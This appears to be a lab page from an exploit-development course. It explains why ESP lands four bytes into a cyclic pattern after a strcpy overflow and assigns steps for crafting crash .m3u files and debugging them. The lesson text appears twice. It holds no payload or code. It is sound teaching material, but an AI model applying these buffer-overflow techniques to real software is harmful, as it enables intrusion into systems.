Lab 4: Shellcode?

Lesson:

Hmmm…

Ok, we can see 2 interesting things here: ESP starts at the 5th character of our pattern, and not the first character

Why?

When a function is called, the first thing it does is pushes the return pointer (EIP) on to the stack
Then it goes to the address of the function
The function (in this case strcpy()), when it RET’s, it will pop the 4 bytes from the stack for that return pointer
- See if this is true in example.exe… does EIP get pushed to the stack, and does RET pop it?
When we go back, then it pops the first 4 bytes
- Can we this in our padding example? Try it… does 1ABCDEFG go to EIP?
When we RET to the start of a function, then we’re not pushing the return pointer on to the stack
We then have to forge this return pointer, i.e. PADD (the missing 4 characters)
If we gave this the address to the exit() function, the program would close gracefully rather than an exception being thrown
NOTE: After the pattern string, we see “A’s” These A’s most likely belong to the first part of the buffer (26064 A’s), so we may also be able to put our shellcode in the first part of the buffer (before overwriting RET)…

Moving on...

We’ll first add 4 characters in front of the pattern and do the test again
If all goes well, ESP should now point directly at the beginning of our pattern
Let the application crash and look at ESP again

Short, but time for some hands-on testing!

Assignment:

Step 1 – Locate which register contains our “shellcode”
Step 2 – Create pattern
Step 3 – Run executable, transfer crash_[sid].m3u to target, and run it in the debugger
Step 4 – Review pattern
- Look at register previously identified
- What is weird about our pattern?
Step 4 – Fix code so that pattern starts at beginning
Step 5 – Run executable, transfer crash_[sid].m3u to target, and run it in the debugger
Step 6 – Verify that ESP is now displaying the full pattern
Step 7 – Write down what the memory location of the beginning of this pattern

Answers:

View associated .txt file

PreviousLab 5: Shellcode testing NextLab 3: Locating EIP

Last updated 4 years ago

Was this helpful?

Lesson:

Hmmm…

Ok, we can see 2 interesting things here: ESP starts at the 5th character of our pattern, and not the first character

Why?

When a function is called, the first thing it does is pushes the return pointer (EIP) on to the stack

Then it goes to the address of the function

The function (in this case strcpy()), when it RET’s, it will pop the 4 bytes from the stack for that return pointer

See if this is true in example.exe… does EIP get pushed to the stack, and does RET pop it?

When we go back, then it pops the first 4 bytes

Can we this in our padding example? Try it… does 1ABCDEFG go to EIP?

When we RET to the start of a function, then we’re not pushing the return pointer on to the stack

We then have to forge this return pointer, i.e. PADD (the missing 4 characters)

If we gave this the address to the exit() function, the program would close gracefully rather than an exception being thrown

NOTE: After the pattern string, we see “A’s” These A’s most likely belong to the first part of the buffer (26064 A’s), so we may also be able to put our shellcode in the first part of the buffer (before overwriting RET)…

Moving on...

We’ll first add 4 characters in front of the pattern and do the test again

If all goes well, ESP should now point directly at the beginning of our pattern

Let the application crash and look at ESP again

Short, but time for some hands-on testing!

Assignment:

Step 1 – Locate which register contains our “shellcode”

Step 2 – Create pattern

Step 3 – Run executable, transfer crash_[sid].m3u to target, and run it in the debugger

Step 4 – Review pattern

Look at register previously identified
What is weird about our pattern?

Step 4 – Fix code so that pattern starts at beginning

Step 5 – Run executable, transfer crash_[sid].m3u to target, and run it in the debugger

Step 6 – Verify that ESP is now displaying the full pattern

Step 7 – Write down what the memory location of the beginning of this pattern